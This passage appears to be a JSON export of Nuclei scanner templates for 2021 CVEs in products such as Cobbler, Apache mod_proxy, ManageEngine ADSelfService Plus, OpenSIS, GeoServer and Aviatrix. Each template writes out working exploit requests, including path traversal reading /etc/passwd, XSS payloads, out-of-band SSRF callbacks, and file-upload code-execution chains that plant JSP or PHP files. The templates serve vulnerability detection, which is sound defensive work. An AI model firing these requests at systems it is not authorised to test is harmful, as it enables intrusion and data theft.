https://github.com/cobbler/cobbler/releases/tag/v3.3.0\n - https://github.com/cobbler/cobbler/issues/2795\n - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40323\n - https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40323\n cwe-id: CWE-94\n epss-score: 0.03051\n epss-percentile: 0.90763\n cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cobbler_project\n product: cobbler\n tags: cve,cve2021,cobbler,rce,cobbler_project\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n find_profile\n \n 
\n \n \n \n name\n \n *\n \n \n \n \n \n \n \n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n generate_script\n \n \n \n {{profile}}\n \n \n \n \n \n \n \n \n \n /etc/passwd\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'text/xml'\n\n - type: regex\n regex:\n - \"root:.*:0\"\n - \"bin:.*:1\"\n - \"nobody:.*:99\"\n condition: or\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: profile\n group: 1\n regex:\n - '(.*?)'\n internal: true\n# digest: 4a0a0047304502206e4478c33e50a35d84d860a861a9f49e8343e5484089045ce8b3093e6faeac1a022100c816efd13f1937362330d8066062d1062b62bdd6a54dce8356e799717937f527:922c64590222798bb761d5b6d8e72950", "hash": "e69ac1d7419ff06613fd1aafe29278ae", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a9" }, "name": "CVE-2021-40438.yaml", "content": "id: CVE-2021-40438\n\ninfo:\n name: Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery\n author: pdteam\n severity: critical\n description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.\n remediation: Upgrade to Apache version 2.4.49 or later.\n reference:\n - https://firzen.de/building-a-poc-for-cve-2021-40438\n - https://httpd.apache.org/security/vulnerabilities_24.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40438\n - https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf\n - https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9\n cve-id: CVE-2021-40438\n cwe-id: CWE-918\n epss-score: 0.97372\n epss-percentile: 0.99897\n cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: http_server\n 
tags: cve2021,cve,ssrf,apache,mod-proxy,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/'\n\n host-redirects: true\n max-redirects: 2\n\n matchers:\n - type: dsl\n dsl:\n - 'contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")'\n - \"!contains(body, '

    Interactsh Server

    ')\"\n condition: and\n# digest: 4a0a00473045022100d8d05e6148126d10da099a868bd043059ea9cd59f882302a022663b194f4cbab0220434cac7a775e4c4845de5dd47b83c2c14723db31dcf51b091617be23b576b578:922c64590222798bb761d5b6d8e72950", "hash": "6ec38d2081dd7d79d7ba72f5a6b9e26c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083aa" }, "name": "CVE-2021-40539.yaml", "content": "id: CVE-2021-40539\n\ninfo:\n name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution\n author: daffainfo,pdteam\n severity: critical\n description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.\n remediation: Upgrade to ADSelfService Plus build 6114.\n reference:\n - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis\n - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\n - https://github.com/synacktiv/CVE-2021-40539\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40539\n - https://www.manageengine.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40539\n cwe-id: CWE-706\n epss-score: 0.97499\n epss-percentile: 0.99976\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp\n\nhttp:\n - raw:\n - |\n POST /./RestAPI/LogonCustomization HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"methodToCall\"\n\n 
unspecified\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"Save\"\n\n yes\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"form\"\n\n smartcard\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"operation\"\n\n Add\n --8b1ab266c41afb773af2e064bc526458\n Content-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%@ page import=\"java.security.MessageDigest\"%>\n <%\n String cve = \"CVE-2021-40539\";\n MessageDigest alg = MessageDigest.getInstance(\"MD5\");\n alg.reset();\n alg.update(cve.getBytes());\n byte[] digest = alg.digest();\n StringBuffer hashedpasswd = new StringBuffer();\n String hx;\n for (int i=0;i\n --8b1ab266c41afb773af2e064bc526458--\n - |\n POST /./RestAPI/LogonCustomization HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"methodToCall\"\n\n unspecified\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"Save\"\n\n yes\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"form\"\n\n smartcard\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"operation\"\n\n Add\n --43992a07d9a30213782780204a9f032b\n Content-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n {{hex_decode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}}\n --43992a07d9a30213782780204a9f032b--\n - |\n POST /./RestAPI/Connection HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n - |\n GET /help/admin-guide/test.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"114f7ce498a54a1be1de1f1e5731d0ea\" # 
MD5 of CVE-2021-40539\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c74e11c1bfb9c715d80f1c403010aa5a992ece98f99ff25aa12b5fdf7a4fe71c0220030dae45c7af30b2d89b390eb53b6bb2b534cf8be0e7c98a0cf98e490434fa5b:922c64590222798bb761d5b6d8e72950", "hash": "6fd0e469dfac83fb49031bc1d1bf4f32", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ab" }, "name": "CVE-2021-40542.yaml", "content": "id: CVE-2021-40542\n\ninfo:\n name: Opensis-Classic 8.0 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: |\n Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://github.com/OS4ED/openSIS-Classic/issues/189\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40542\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40542\n cwe-id: CWE-79\n epss-score: 0.00643\n epss-percentile: 0.78811\n cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: os4ed\n product: opensis\n shodan-query: http.title:\"openSIS\"\n tags: cve2021,cve,xss,opensis,os4ed\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: 
header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950", "hash": "7eb5af80daa4d88fe3c6dc409b4538f4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ac" }, "name": "CVE-2021-40651.yaml", "content": "id: CVE-2021-40651\n\ninfo:\n name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion\n author: ctflearner\n severity: medium\n description: |\n OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n reference:\n - https://www.exploit-db.com/exploits/50259\n - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md\n - https://www.youtube.com/watch?v=wFwlbXANRCo\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40651\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-40651\n cwe-id: CWE-22\n cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*\n metadata:\n max-request: 2\n product: opensis\n vendor: os4ed\n shodan-query: \"title:\\\"openSIS\\\"\"\n tags: cve,cve2021,lfi,os4ed,opensis,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n USERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n\n - |\n GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - 'contains(body_1, \"openSIS\")'\n - \"status_code == 200\"\n condition: and\n# digest: 
4b0a00483046022100b777c6dc91c4e0b6009c87ff6f67a70d09e714c2bd6a19cae6029a079bffc337022100936149daaf5ffa9f58ed3a99dc2885caedd9aa5ddc873eb8b48eff764af3110d:922c64590222798bb761d5b6d8e72950", "hash": "a343e9f65c759625befb36b163d00102", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ad" }, "name": "CVE-2021-40661.yaml", "content": "id: CVE-2021-40661\n\ninfo:\n name: IND780 - Local File Inclusion\n author: For3stCo1d\n severity: high\n description: |\n IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks.\n reference:\n - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661\n - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40661\n - https://github.com/Live-Hack-CVE/CVE-2021-40661\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40661\n cwe-id: CWE-22\n epss-score: 0.01137\n epss-percentile: 0.84411\n cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:*\n 
metadata:\n verified: true\n max-request: 1\n vendor: mt\n product: ind780_firmware\n shodan-query: IND780\n google-query: inurl:excalweb.dll\n tags: cve2021,cve,ind780,lfi,mt\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ExePath=\\Windows'\n - 'WorkDir=\\Windows'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950", "hash": "9b827bb104030bf2b0eee807e75acbad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ae" }, "name": "CVE-2021-40822.yaml", "content": "id: CVE-2021-40822\n\ninfo:\n name: Geoserver - Server-Side Request Forgery\n author: For3stCo1d,aringo-bf\n severity: high\n description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability.\n reference:\n - https://gccybermonks.com/posts/cve-2021-40822/\n - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3\n - https://github.com/geoserver/geoserver/releases\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40822\n - https://osgeo-org.atlassian.net/browse/GEOS-10229\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40822\n cwe-id: CWE-918\n epss-score: 0.68366\n epss-percentile: 0.97892\n cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: osgeo\n product: 
geoserver\n shodan-query: title:\"GeoServer\"\n fofa-query: app=\"GeoServer\"\n tags: cve2021,cve,ssrf,geoserver,osgeo\n\nhttp:\n - raw:\n - |\n POST /geoserver/TestWfsPost HTTP/1.1\n Host: oast.pro\n Content-Type: application/x-www-form-urlencoded\n\n form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950", "hash": "69550365737482bf98a83b11007ca212", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083af" }, "name": "CVE-2021-40856.yaml", "content": "id: CVE-2021-40856\n\ninfo:\n name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass\n author: gy741\n severity: high\n description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix \"/about/../\" allows bypassing the authentication check for the web-based configuration management interface. 
This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the device.\n remediation: |\n Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40856\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass\n - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses\n - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40856\n cwe-id: CWE-706\n epss-score: 0.19673\n epss-percentile: 0.96195\n cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: auerswald\n product: comfortel_3600_ip_firmware\n tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald\n\nhttp:\n - raw:\n - |\n GET /about/../tree?action=get HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"TYPE\"'\n - '\"ITEMS\"'\n - '\"COUNT\"'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028bdba9d64a2d18b27dfebb790b671539f778631bd979ac1642a47088b5b2917022100b0e42914393ecfa44d74f6f6638170bb5062a2c97feaf4811f7b8290f7e1be46:922c64590222798bb761d5b6d8e72950", "hash": "4d6c540572fc6b13489e396947141afb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b0" }, "name": "CVE-2021-40859.yaml", "content": "id: CVE-2021-40859\n\ninfo:\n name: Auerswald COMpact 5500R 7.8A and 8.0B Devices 
Backdoor\n author: pussycat0x\n severity: critical\n description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (\"https://192.168.1[.]2/about_state\"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.\n impact: |\n Unauthenticated attackers can gain unauthorized access to affected devices.\n remediation: |\n Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability.\n reference:\n - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40859\n - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40859\n epss-score: 0.02655\n epss-percentile: 0.89305\n cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: auerswald\n product: compact_5500r_firmware\n fofa-query: '\"auerswald\"'\n tags: cve2021,cve,iot,unauth,voip,auerswald\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/about_state\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"pbx\"'\n - '\"dongleStatus\":0'\n - '\"macaddr\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207e9f03cfc22824f9b2ffecb480c87c419947367e3e1022181f8ff6eb96a4ec3d022033e425c150edf47cd52e2d6594313121ea1d7ab5e889217bad42b5f1ef22ac70:922c64590222798bb761d5b6d8e72950", "hash": "f7c1b3a1b41c3baf131f9c5f490adaac", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b1" }, "name": "CVE-2021-40868.yaml", "content": "id: CVE-2021-40868\n\ninfo:\n name: 
Cloudron 6.2 Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Upgrade to Cloudron 6.3 or higher.\n reference:\n - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40868\n - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html\n - https://www.cloudron.io/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40868\n cwe-id: CWE-79\n epss-score: 0.00379\n epss-percentile: 0.72411\n cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cloudron\n product: cloudron\n tags: cve2021,cve,xss,cloudron,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - ''\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201c3cd3fcfe337c0c3bf3f141e268c4cb3e002423d6e3548ff23bcbd491c3985f022100ea3bc691a51662cc8e63a76bfd75b8dd912d1a978fee1f84bb0fc26d13aff053:922c64590222798bb761d5b6d8e72950", "hash": "7611e0c5ad8662539f528ebb92949cd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b2" }, "name": "CVE-2021-40870.yaml", "content": "id: CVE-2021-40870\n\ninfo:\n name: Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution\n author: pikpikcu\n severity: critical\n description: Aviatrix 
Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability.\n reference:\n - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021\n - https://wearetradecraft.com/advisories/tc-2021-0002/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40870\n - http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40870\n cwe-id: CWE-23\n epss-score: 0.85536\n epss-percentile: 0.98294\n cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: aviatrix\n product: controller\n tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload\n\nhttp:\n - raw:\n - |\n POST /v1/backend1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=\n - |\n GET /v1/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '0d95513363fd69b9fee712f333293654'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b4ab0789330c0b1411a4a172a6b1f4b2d10ac3db69314c40b5a0b62e2d45e1f02206492a8c94b9f5acd0daacb9ee1023062b7d819ec1eb3a30a732a884009f3a527:922c64590222798bb761d5b6d8e72950", "hash": "8097969a0a7066ba438aad3fd166f23f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3083b3" }, "name": "CVE-2021-40875.yaml", "content": "id: CVE-2021-40875\n\ninfo:\n name: Gurock TestRail Application files.md5 Exposure\n author: oscarintherocks\n severity: high\n description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.\n impact: |\n An attacker could use the exposed files.md5 to gain insight into the application's file structure and potentially identify vulnerabilities or sensitive information.\n remediation: |\n Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users.\n reference:\n - https://github.com/SakuraSamuraii/derailed\n - https://johnjhacking.com/blog/cve-2021-40875/\n - https://www.gurock.com/testrail/tour/enterprise-edition\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875\n - https://github.com/SakuraSamuraii/derailed\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40875\n cwe-id: CWE-425\n epss-score: 0.25891\n epss-percentile: 0.96608\n cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gurock\n product: testrail\n shodan-query: http.html:\"TestRail\"\n tags: cve2021,cve,exposure,gurock,testrail\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/files.md5\"\n - \"{{BaseURL}}/testrail/files.md5\"\n\n stop-at-first-match: true\n max-size: 1000 # Define response size in bytes to read from server.\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"app/arguments/admin\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402207646eee4aa56e0329051709dffce67b5a0edf5f25c7eb190e70efc6d1b7b6f8c02202b08a5b0dd6adc756b48637e62ccc41bc5216d7b2207c2e52a2ff701a708d1e7:922c64590222798bb761d5b6d8e72950", "hash": "6f8fd165cb64438fafd01bd3307776e8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b4" }, "name": "CVE-2021-40908.yaml", "content": "id: CVE-2021-40908\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.\n reference:\n - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40908\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40908\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.8612\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; 
